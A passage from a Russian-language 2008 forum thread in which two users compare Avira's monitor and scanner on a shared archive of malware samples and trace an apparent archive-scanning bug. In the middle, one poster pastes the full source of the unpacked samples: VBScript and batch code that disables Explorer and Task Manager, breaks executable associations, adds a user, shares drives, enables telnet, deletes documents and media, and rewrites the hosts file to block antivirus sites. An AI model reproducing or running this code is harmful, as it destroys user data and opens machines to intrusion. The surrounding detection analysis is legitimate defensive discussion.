Ru-Board.club
← Вернуться в раздел «Программы»

» Обзор антивирусов под Windows

Автор: gjf
Дата сообщения: 17.07.2008 18:00
aleksdem2
А, ну может быть - сканером не проверял.
Кстати об этом. Последние несколько дней монитор тупо ругается на XPSmoker, который ещё на прошлой неделе признан разрабами фалсом. Так вот, сканер его не считает вирусом, а монитор - всё ещё считает. Странно....
А между прочим у Авировцев на автопроверке по веб-форме стоят мониторовские базы, потому как все 13 файлов были признаны со статусом UNDER ANALYSIS, в то время, как по словам aleksdem2 из них 7 убиваются сканером.
Автор: aleksdem2
Дата сообщения: 17.07.2008 18:00
gjf и все любители немецкого качества...
Разобрался я с фокусами монитора Avira. В настройках гуарда (монитора) возле опций "проверять архивы" нужно оставить птицу только возле верхней строки - "проверять архивы". Возле всех остальных - снять. (Глубина рекурсии и т.д.). Тогда настройки его будут действительно идентичны сканеровским и результаты проверки зловредов совершенно одинаковыми. (В выше приведенном архиве остается неопознанными 6 фалов).
Автор: gjf
Дата сообщения: 17.07.2008 18:02
aleksdem2
Странно, при чём здесь эта опция, если все 13 файлов - исполняемые?
Автор: aleksdem2
Дата сообщения: 17.07.2008 18:08
gjf
Вы не поддавайте сомнению прописные истины, а лучше проверте - у Вас же под рукой Avira. Кто Вам сказал, что они исполняемые (exe)? Вы верите надписям на вирусах? Это обычные архивы. Кстати, многие exe тоже являются самораспаковывающимися архивами.
Цитата:
сканер его не считает вирусом, а монитор - всё ещё считает

Все это только от настроек зависит. Базами сканер и монитор пользуются одними и теми же.
Автор: gjf
Дата сообщения: 17.07.2008 19:07
aleksdem2
Я верю не надписям вирусов, а MZ-сигнатуре файла, которая отличается от PK-сигнатуры архива.
ОК, внимательно всё проверил. Но немножко не так, как вы. Итого...

1. Все из 13 файлов, кроме ICQ_patch.exe и winamp 6 beta .exe являются самораспаковывающимися архивами. Отсюда вывод: Авира считает архивами все упакованные файлы, в том числе и самораспаковывающиеся, кроме тех, что упакованы exe-пакерами. Странно, потому что в некоторых других антивирусах оценка идёт по расширению, здесь же - по сигнатурной метке файла. При этом получается, что запакованные утилитам типа UPX файлы с расширением exe рассматриваются как исполняемые, а запакованные WinZip или другим архиватором с таким же расширением exe и скриптом постпроцессинга - исполняемыми файлами не считаются и рассматриваются как архивы.
Ну по мне так не нужно ставить метку проверки архивов в мониторе, чтобы не грузить ресурсы. Тем паче, что при распаковке и обнаружении вредоносного содержимого монитор сразу начинает орать, не давая содержимому запуститься, что лично проверил. Об этом - ниже.

2. После распаковки 7-Zipом оставшихся 11 файлов были вирусы не были обнаружены в следующих файлах:

13.07.2008 19:17 262 055 ad-award.exe
13.07.2008 19:02 174 562 Firefox.exe
13.07.2008 19:06 142 427 ESS-NOD32 Fix 2047 Lite 1.5.exe
13.07.2008 19:08 176 790 Локальный диск (С).exe
13.07.2008 19:26 124 568 Пароли от аськи.exe

Все остальные орали и удалялись монитором. Ради эксперимента попытался запустить, например, Адресса абонентов Кабельного ТВ.exe, в котором сидит lol.bat - монитор заорал и запустить вложение не дал. Таким образом, если вирусы сидят в архивах - это не страшно даже при выключенной опции проверки архивов монитора, потому как вред системе наносит вложение.

3. Все оставшиеся файлы содержат явно вредоносный код. [more]
---------------------------------------------------------------------------------------------------------
'is novirus not detected kasperom FIGA %4539026848950r602758060580975468rBOK%
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regdelete"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetworkConnections","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuNetworkPlaces","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartmenuLogoff","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMorePrograms","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel","1","REG_DWORD"
set application=createobject("shell.application")
application.minimizeall
s.run"rundll32 user32, SwapMouseButton"
s.regwrite"HKCR\exefile\shell\open\command\","rundll32.exe"

do
wscript.sleep 200
s.sendkeys"{capslock}"
wscript.sleep 200
s.sendkeys"{numlock}"
wscript.sleep 200
s.sendkeys"{scrolllock}"
fso.getfile("A:\")
execute"S.Run ""%comspec% /c "" & Chr(7), 0,True"
loop

---------------------------------------------------------------------------------------------------------
'is novirus not detected kasperom FIGA
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
'Virus: ZLOBAPOSDA{
'Autor: dlrkfg;askdl;
s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun","0","REG_DWORD"randomize
do
h=cint(rnd()*1000)
m=cint(rnd()*1000)
if h<=23 and m<=59 then
wscript.sleep 1000
s.run "cmd /c time "&h&":"&m,0
end if
loops.run"net share c=c:\",0
s.run"net share d=d:\",0
s.run"net share e=e:\",0
s.regdelete"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\"
s.run"net user СКУКЛДмлеуйкдл 123 /add",0
i=1
while i>0 or i<0
S.popup "Женская пизда !",0, "Заголовок сообщения",0+0
i=i-1
wend
s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR\Start","4","REG_DWORD"

do
execute"S.Run ""%comspec% /c "" & Chr(7), 0,True"
loop

---------------------------------------------------------------------------------------------------------
copy %0 %WinDir%\win.bat
copy %0 %WinDir%\chat.bat
copy %0 %WinDir%\driver.bat
copy %0 %WinDir%\explorer.bat
copy %0 %WinDir%\joomla.bat
copy %0 %WinDir%\comediaz.bat
copy %0 %WinDir%\fsZL.bat
copy %0 %WinDir%\fZ.bat
copy %0 %WinDir%\COoll.bat
copy %0 %WinDir%\system32\ixkxxrsj.bat
copy %0 %WinDir%\system32\security.bat
copy %0 %WinDir%\Temp\ie.bat
copy %0 %WinDir%\Temp\opera.bat
copy %0 %WinDir%\Temp\google.bat
copy %0 %WinDir%\Temp\yahoo.bat
copy %0 %WinDir%\Temp\joomls.html
copy %0 %WinDir%\Temp\NT.bat
copy %0 %WinDir%\Temp\sex.bat
copy %0 %WinDir%\Temp\LolL.bat
copy %0 %WinDir%\Temp\porn.bat
copy %0 %WinDir%\Temp\sanitar fixa.bat
copy %0 %WinDir%\Temp\drweb.bat
copy %0 %WinDir%\Temp\nod32.bat
copy %0 %WinDir%\Temp\Zlob.bat
copy %0 %WinDir%\Temp\G-Unit.bat
copy %0 C:\Foobar.bat
copy %0 C:\footbal.bat
copy %0 C:\sex.bat
copy %0 C:\svchost.exe
copy %0 D:\autoran.bat
copy %0 C:\voozoofoo.bat
copy %0 %WinDir%\Temp\lovv-Unit.bat
copy %0 %WinDir%\Temp\ebla.js
copy %0 C:\Program Files\Windows Media Player\krot.exe
copy %0 C:\Program Files\Windows Media Player\ntosssssssssssss.exe
copy %0 C:\Program Files\Windows Media Player\FUCK.exe
copy %0 %WinDir%\system\Driver_for_video.bat
copy %0 %WinDir%\Temp\cch~6666666.bat
copy %0 D:\ipon.bat
copy %0 D:\KIS.bat
copy %0 D:\Dr.web!.bat
copy %0 D:\nod432.bat
copy %0 D:\yuh.bat
copy %0 D:\mmh.bat
copy %0 %WinDir%\WinSys2.bat
copy %0 D:\H@@@@@@@@@@k.bat
copy %0 D:\fan.bat
copy %0 D:\win.bat
copy %0 D:\chat.bat
copy %0 D:\driver.bat
copy %0 D:\explorer.bat
copy %0 D:\joomla.bat
copy %0 D:\comediaz.bat
copy %0 D:\fsZL.bat
copy %0 D:\fZ.bat
copy %0 D:\COoll.bat
copy %0 D:\system32\ixkxxrsj.bat
copy %0 D:\system32\security.bat
copy %0 D:\Temp\ie.bat
copy %0 D:\Temp\opera.bat
copy %0 D:\Temp\google.bat
copy %0 D:\ahoo.bat
copy %0 D:\joomls.html
copy %0 D:\gojo.bat
copy %0 D:\sex.bat
copy %0 D:\LolL.bat
copy %0 D:\porn.bat
copy %0 D:\sanitar fixa.bat
copy %0 D:\drweb.bat
copy %0 D:\nod32.bat
copy %0 D:\Zlob.bat
copy %0 D:\G-Unit.bat
copy %0 D:\Foobar.bat
copy %0 D:\footbal.bat
copy %0 D:\sex.bat
copy %0 D:\svchost.exe
copy %0 D:\autoran.bat
copy %0 D:\voozoofoo.bat
copy %0 D:\lovv-Unit.bat
copy %0 D:\ebla.js
copy %0 D:\Yupdate.exe
copy %0 D:\pinch.bat
copy %0 %WinDir%\system32\c0mp.exe
copy %0 %WinDir%\system32\cAmp.exe
copy %0 %WinDir%\system32\c1mp.exe
copy %0 %WinDir%\system32\LAB.//svchost//kimg.bat
copy %0 %WinDir%\system32\GUI.bat
copy %0 %WinDir%\Temp\svchost.bat
copy %0 %WinDir%\Temp\obie_trice.bat
copy %0 %WinDir%\Temp\vodKa.bat
copy %0 %WinDir%\Temp\drwweb.bat
copy %0 %WinDir%\Temp\game.bat
copy %0 C:\GTA.bat
copy %0 C:\superman.bat
copy %0 C:\icq.bat
copy %0 C:\two_little_beautiful_girls_________________________________________________________________jpg.bat
copy %0 C:\bizatch.bat
copy %0 C:\Suckz.bat
copy %0 C:\punk.bat
copy %0 %WinDir%\fuck.bat
copy %0 %WinDir%\winchat.bat
copy %0 %WinDir%\bin.bat
copy %0 %WinDir%\rootkit.bat
copy %0 %WinDir%\impraud.bat
ATTRIB -A -R -S +H C:\WINDOWS
MD "C:\DOS"
MD "C:\Hook"
MD "C:\"Windows98"
MD "C:\win\systema\bot\loki\svchost\"
copy %0 C:\win\systema\bot\loki\svchost\win_api.bat
MD "C:\Rotten"
MD "D:\bot"
copy %0 D:\bot\bot.bat
copy %0 C:\"Windows98\w86.bat
copy %0 C:\Hook\h@@k.bat
copy %0 C:\DOS\dos.bat
copy %0 C:\Rotten\Rotten.bat
MD "C:\ESET\"
copy %0 C:\ESET\Nod32.bat
copy %0 C:\ESET\Nod32.dll
copy %0 C:\ESET\Nod32.dat
copy %0 C:\ESET\eset.bat
copy %0 C:\ESET\virus.bat
copy %0 C:\ESET\Joiner.bat
label D: Lol
label C: Hol
time 11:42
date 10.10.99
chcp 1251
cd %USERPROFILE%\Главное меню\Программы\Автозагрузка
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 10
md 11
md 12
md 13
md 14
md 15
md 16
md 17
md 18
md 19
md 20
md 21
md 22
md 23
md 24
md 25
md 26
md 27
md 28
md 29
md 30
md 31
md 32
md 33
md 34
md 35
md 36
md 37
md 38
md 39
md 40
md 41
md 42
md 43
md 44
md 45
md 46
md 47
md 48
md 49
md 50
md 51
md 52
md 53
md 54
md 55
md 56
md 57
md 58
md 59
md 60
md 61
md 62
md 63
md 64
md 65
md 66
md 67
md 68
md 69
md 70
md 71
md 72
md 73
md 74
md 75
md 76
md 77
md 78
md 79
md 80
md 81
md 82
md 83
md 84
md 85
md 86
md 87
md 88
md 89
md 90
md 91
md 92
md 93
md 94
md 95
md 96
md 97
md 98
md 99
md 100
md 101
md 102
md 103
md 104
md 105
md 106
md 107
md 108
md 109
md 110
md 111
md 112
md 113
md 114
md 115
md 116
md 117
md 118
md 119
md 120
md 121
md 122
md 123
md 124
md 125
md 126
md 127
md 128
md 129
md 130
md 131
md 132
md 133
md 134
md 135
md 136
md 137
md 138
md 139
md 140
md 141
md 142
md 143
md 144
md 145
md 146
md 147
md 148
md 149
md 150
md 151
md 152
md 153
md 154
md 155
md 156
md 157
md 158
md 159
md 160
md 161
md 162
md 163
md 164
md 165
md 166
md 167
md 168
md 169
md 170
md 171
md 172
md 173
md 174
md 175
md 176
md 177
md 178
md 179
md 180
md 181
md 182
md 183
md 184
md 185
md 186
md 187
md 188
md 189
md 190
md 191
md 192
md 193
md 194
md 195
md 196
md 197
md 198
md 199
md 200
md 201
md 202
md 203
md 204
md 205
md 206
md 207
md 208
md 209
md 210
md 211
md 212
md 213
md 214
md 215
md 216
md 217
md 218
md 219
md 220
md 221
md 222
md 223
md 224
md 225
md 226
md 227
md 228
md 229
md 230
md 231
md 232
md 233
md 234
md 235
md 236
md 237
md 238
md 239
md 240
md 241
md 242
md 243
md 244
md 245
md 246
md 247
md 248
md 249
md 250
md 251
md 252
md 253
md 254
md 255
md 256
md 257
md 258
md 259
md 260
md 261
md 262
md 263
md 264
md 265
md 266
md 267
md 268
md 269
md 270
md 271
md 272
md 273
md 274
md 275
md 276
md 277
md 278
md 279
md 280
md 281
md 282
md 283
md 284
md 285
md 286
md 287
md 288
md 289
md 290
md 291
md 292
md 293
md 294
md 295
md 296
md 297
md 298
md 299
md 300
md 301
md 302
md 303
md 304
md 305
md 306
md 307
md 308
md 309
md 310
md 311
md 312
md 313
md 314
md 315
md 316
md 317
md 318
md 319
md 320
md 321
md 322
md 323
md 324
md 325
md 326
md 327
md 328
md 329
md 330
md 331
md 332
md 333
md 334
md 335
md 336
md 337
md 338
md 339
md 340
md 341
md 342
md 343
md 344
md 345
md 346
md 347
md 348
md 349
md 350
md 351
md 352
md 353
md 354
md 355
md 356
md 357
md 358
md 359
md 360
md 361
md 362
md 363
md 364
md 365
md 366
md 367
md 368
md 369
md 370
md 371
md 372
md 373
md 374
md 375
md 376
md 377
md 378
md 379
md 380
md 381
md 382
md 383
md 384
md 385
md 386
md 387
md 388
md 389
md 390
md 391
md 392
md 393
md 394
md 395
md 396
md 397
md 398
md 399
md 400
md 401
md 402
md 403
md 404
md 405
md 406
md 407
md 408
md 409
md 410
md 411
md 412
md 413
md 414
md 415
md 416
md 417
md 418
md 419
md 420
md 421
md 422
md 423
md 424
md 425
md 426
md 427
md 428
md 429
md 430
md 431
md 432
md 433
md 434
md 435
md 436
md 437
md 438
md 439
md 440
md 441
md 442
md 443
md 444
md 445
md 446
md 447
md 448
md 449
md 450
md 451
md 452
md 453
md 454
md 455
md 456
md 457
md 458
md 459
md 460
md 461
md 462
md 463
md 464
md 465
md 466
md 467
md 468
md 469
md 470
md 471
md 472
md 473
md 474
md 475
md 476
md 477
md 478
md 479
md 480
md 481
md 482
md 483
md 484
md 485
md 486
md 487
md 488
md 489
md 490
md 491
md 492
md 493
md 494
md 495
md 496
md 497
md 498
md 499
md 500
md 501
md 502
md 503
md 504
md 505
md 506
md 507
md 508
md 509
md 510
md 511
md 512
md 513
md 514
md 515
md 516
md 517
md 518
md 519
md 520
md 521
md 522
md 523
md 524
md 525
md 526
md 527
md 528
md 529
md 530
md 531
md 532
md 533
md 534
md 535
md 536
md 537
md 538
md 539
md 540
md 541
md 542
md 543
md 544
md 545
md 546
md 547
md 548
md 549
md 550
md 551
md 552
md 553
md 554
md 555
md 556
md 557
md 558
md 559
md 560
md 561
md 562
md 563
md 564
md 565
md 566
md 567
md 568
md 569
md 570
md 571
md 572
md 573
md 574
md 575
md 576
md 577
md 578
md 579
md 580
md 581
md 582
md 583
md 584
md 585
md 586
md 587
md 588
md 589
md 590
md 591
md 592
md 593
md 594
md 595
md 596
md 597
md 598
md 599
md 600
md 601
md 602
md 603
md 604
md 605
md 606
md 607
md 608
md 609
md 610
md 611
md 612
md 613
md 614
md 615
md 616
md 617
md 618
md 619
md 620
md 621
md 622
md 623
md 624
md 625
md 626
md 627
md 628
md 629
md 630
md 631
md 632
md 633
md 634
md 635
md 636
md 637
md 638
md 639
md 640
md 641
md 642
md 643
md 644
md 645
md 646
md 647
md 648
md 649
md 650
md 651
md 652
md 653
md 654
md 655
md 656
md 657
md 658
md 659
md 660
md 661
md 662
md 663
md 664
md 665
md 666
md 667
md 668
md 669
md 670
md 671
md 672
md 673
md 674
md 675
md 676
md 677
md 678
md 679
md 680
md 681
md 682
md 683
md 684
md 685
md 686
md 687
md 688
md 689
md 690
md 691
md 692
md 693
md 694
md 695
md 696
md 697
md 698
md 699
md 700
md 701
md 702
md 703
md 704
md 705
md 706
md 707
md 708
md 709
md 710
md 711
md 712
md 713
md 714
md 715
md 716
md 717
md 718
md 719
md 720
md 721
md 722
md 723
md 724
md 725
md 726
md 727
md 728
md 729
md 730
md 731
md 732
md 733
md 734
md 735
md 736
md 737
md 738
md 739
md 740
md 741
md 742
md 743
md 744
md 745
md 746
md 747
md 748
md 749
md 750
md 751
md 752
md 753
md 754
md 755
md 756
md 757
md 758
md 759
md 760
md 761
md 762
md 763
md 764
md 765
md 766
md 767
md 768
md 769
md 770
md 771
md 772
md 773
md 774
md 775
md 776
md 777
md 778
md 779
md 780
md 781
md 782
md 783
md 784
md 785
md 786
md 787
md C:\Microsoft
copy C:\*.* C:\Microsoft\system
copy C:\*.* C:\Microsoft\mouse
copy C:\*.* C:\Microsoft\keyboard
copy C:\*.* C:\Microsoft\screen
copy C:\*.* C:\Microsoft\drivers
copy C:\*.* C:\Microsoft\Internet
copy C:\*.* C:\Microsoft\Executable
copy %WinDir%\*.* C:\Microsoft\program
copy %WinDir%\*.* C:\Microsoft\driver
del /f /s /q C:\*.doc
del /f /s /q D:\*.doc
del /f /s /q C:\*.mp3
del /f /s /q D:\*.mp3
del /f /s /q D:\*.zip
del /f /s /q C:\*.zip
MD "C:\virus\virus\virus\virus\virus\virus\virus"
attrib +h C:\virus\virus\virus\virus\virus\virus\virus
copy %0 C:\virus\virus\virus\virus\virus\virus\virus\virus.bat
copy %0 C:\virus\virus\virus\virus\virus\virus\virus\2virus.bat
MD "C:\voland"
attrib +h C:\voland
MD "C:\kAzakKKK"
attrib +h C:\kAzakKKK
copy %0 C:\voland\voland.bat
@echo del /f /s /q C:\*.msi >C:\antivir.bat
chcp 1251
cd %USERPROFILE%\Главное меню\Программы\Автозагрузка
md wormerz
copy %0 C:\bux.bat
copy %0 C:\bux1.bat
copy %0 C:\bux2.bat
copy %0 C:\bux3.bat
copy %0 C:\ntrld.bot.bat
Echo 6.6.6.6 www.odnoklassniki.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.google.ru >>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.google.com >>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.kaspersky.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.kaspersky.com>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.virusinfo.info>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.yandex.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.rambler.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.antichat.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.google.cn>>%WinDir%\system32/drivers/etc/hosts
Echo 6.6.6.6 www.kaspersky.cn>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.symantec.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 securityresponse.symantec.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 symantec.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.sophos.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 sophos.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.mcafee.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 mcafee.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads-us1.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 updates1.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 updates2.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 updates3.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads1.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads2.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads3.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 ftp.downloads1.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 ftp.downloads2.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 ftp.downloads3.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 liveupdate.symantecliveupdate.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.viruslist.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.dnl-ru1.kaspersky-labs.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.trendmicro.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.pandasoftware.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.viruslab.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 av.rambler.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.nod32.izcity.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.help-antivirus.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.dr-web.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.agnitum.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.forum.kaspersky.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 forum.kaspersky.com>>%WinDir%\system32/drivers/etc/hosts
copy %0 %WinDir%\\system32\kavo.bat
copy %0 %WinDir%\\system32\rqRIyXOh.bat
copy %0 %WinDir%\\system32\mlJAtTki.dll
copy %0 C:\ie_updates3r.bat
copy %0 %Temp%\kusok.bat
copy %0 %Temp%\~DFUCK48.tmp
copy %0 C:\ntldr.bat
attrib +s +r C:\ntldr.bat
copy %0 C:\Mico.bat
copy %0 D:\Mico.bat
attrib +s C:\Mico.bat
reg add "hklm\software\microsoft\windows\currentversion\run" /v drive /t reg_sz /d C:\Mico.bat"
reg add "hklm\software\microsoft\windows\currentversion\runservices" /v drive /t reg_sz /d C:\Mico.bat"
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v DisableTaskMgr /t reg_dword /d 1"
reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v DisableRegistryTools /t reg_dword /d 1"
reg add "hkcu\software\microsoft\windows\currentversion\policies\explorer" /v NoStartMenuMorePrograms /t reg_dword /d 1"
reg add "hkcu\software\microsoft\windows\currentversion\policies\explorer" /v NoClose /t reg_dword /d 1"
reg add "hkcu\controlpanel\desktop\windowmetrics" /v Shell Icon Size /t reg_sz /d 300/f"
reg add "hkcu\controlpanel\mouse" /v MouseSensitivy /t reg_sz /d 0/f"
reg add "hkcu\controlpanel\mouse" /v MouseSpeed /t reg_sz /d 40/f"
sc stop wscsvc > nul
sc stop SharedAccess > nul
sc config wscsvc start= disabled > nul
sc config SharedAccess start= disabled > nul
sc config tlntsvr start= auto > nul
sc config termservice start= auto > nul
sc start tlntsvr > nul
sc start termservice > nul
net share disk_d=d: > nul
net share disk_c=c: > nul
net share disk_x=x: > nul
net share disk_y=y: > nul
net share disk_z=z: > nul
net share disk_f=f: > nul
MD "D:\WinFUCK"
copy %0 D:\WinFUCK\Svch0st.bat
Echo 127.0.0.1 www.3dnews.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.nod32ru.com>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.nod-32.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.esetnod32.ru>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 www.avast.ru>>%WinDir%\system32/drivers/etc/hosts
copy %0 %WinDir%\Yuka.bat
copy %0 %WinDir%\ccc.bat
copy %0 %WinDir%\system32\cilcodol.bat
copy %0 %WinDir%\system32\guest.bat
copy %0 %WinDir%\Temp\Vvv.bat
copy %0 %WinDir%\Temp\oDft22.bat
copy %0 %WinDir%\Temp\gzz.bat
copy %0 %WinDir%\Temp\temper.bat
copy %0 %WinDir%\Temp\LOL.html
copy %0 %WinDir%\Temp\Zzzzzzz.bat
copy %0 %WinDir%\Temp\cokiezz.bat
copy %0 %WinDir%\Temp\puu.bat
copy %0 %WinDir%\Temp\p2uya.bat
Echo 127.0.0.1 downloads1.kaspersky-labs.com/products>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads2.kaspersky-labs.com/products>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads3.kaspersky-labs.com/products>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads4.kaspersky-labs.com/products>>%WinDir%\system32/drivers/etc/hosts
Echo 127.0.0.1 downloads5.kaspersky-labs.com/products>>%WinDir%\system32/drivers/etc/hosts
echo Shutdown -t 0 –s>%Windir%\system32\drivers\etc\host.bat

---------------------------------------------------------------------------------------------------------
[/more]

Некоторые моменты дают основания считать, что как минимум один код писался русскоязычным населением. Странно, что не все отечественные антивирусы его "увидели".

Итого имеем 7 вирусов (5 - самораспаковывающиеся архивы, два - исполняемые файлы), которые Авира не увидела.

Добавлено:
aleksdem2
Кто из этих 7 лишний? По Вашим словам у вас оставалось 6 файлов.
Автор: aleksdem2
Дата сообщения: 17.07.2008 19:29
gjf

Цитата:
Ну по мне так не нужно ставить метку проверки архивов в мониторе, чтобы не грузить ресурсы.

Это другой вопрос. Можно вообще хоть один вебмонитор оставить. (На любителя). Речь шла о другом: почему у Вас Avira при помощи монитора не увидела 7 вирей. (У меня 5). Я нашел причину и объяснил, как её устранить. Все остальные распаковки и рассуждения "что страшно, а что нет" к делу (вопросу о зловредах в выложенном архиве) не относятся.

To all
Что-то мне непонятно молчание счастливых обладателей других антивирусных решений.
Стоит ли это понимать, что вообще ни один антивирус, кроме Avira, в данном архиве ничего не видит?

Добавлено:
gjf
Вы не внимательны совершенно. На прошлой странице я давал названия файлов, в которых Avira при максимальных настройкаках не нашла зловредов (без всяких распаковок):
Пароли от аськи.exe
winamp 6 beta .exe
Локальный диск (С).exe
Firefox.exe
ad-award.exe
ESS-NOD32 Fix 2047 Lite 1.5.exe
Вот и смотрите, что там у Вас еще упущено в настройках.
Автор: gjf
Дата сообщения: 17.07.2008 19:49
aleksdem2
Не думаю, что вы сильно пострадали, ткнув меня носом. Невнимательность объясняется тем, что писал в ходе рабочего дня, а на работе внимание отвлечено на другие вещи. Сейчас уже могу полностью посвятить себя форуму
То, что у вас файлов меньше, объясняется тем, что вы работаете с максимальным уровнем эвристики. У меня же стоит средний. Тем не менее тот же ICQ_patch.exe не обнаруживается сигнатурами Авиры, хотя судя по другим антивирусам, внутри сидит пинч.
Автор: aleksdem2
Дата сообщения: 17.07.2008 20:03
gjf

Цитата:
Не думаю, что вы сильно пострадали

Да нет, конечо. И вообще, предлагаю без обид. Благодаря нашим с Вами разбирательствам сегодня же разработчики Avira узнают о явном баге своей (отличной) программы, связанной с настройками опций проверки архивов. Программа, как оказалось, при любых указанных размерах архива, рекурсии и т.д., просто монитором не проверяет самораспаковывающиеся архивы. А все остальное - не важно...
Автор: gjf
Дата сообщения: 17.07.2008 20:12
aleksdem2
100%
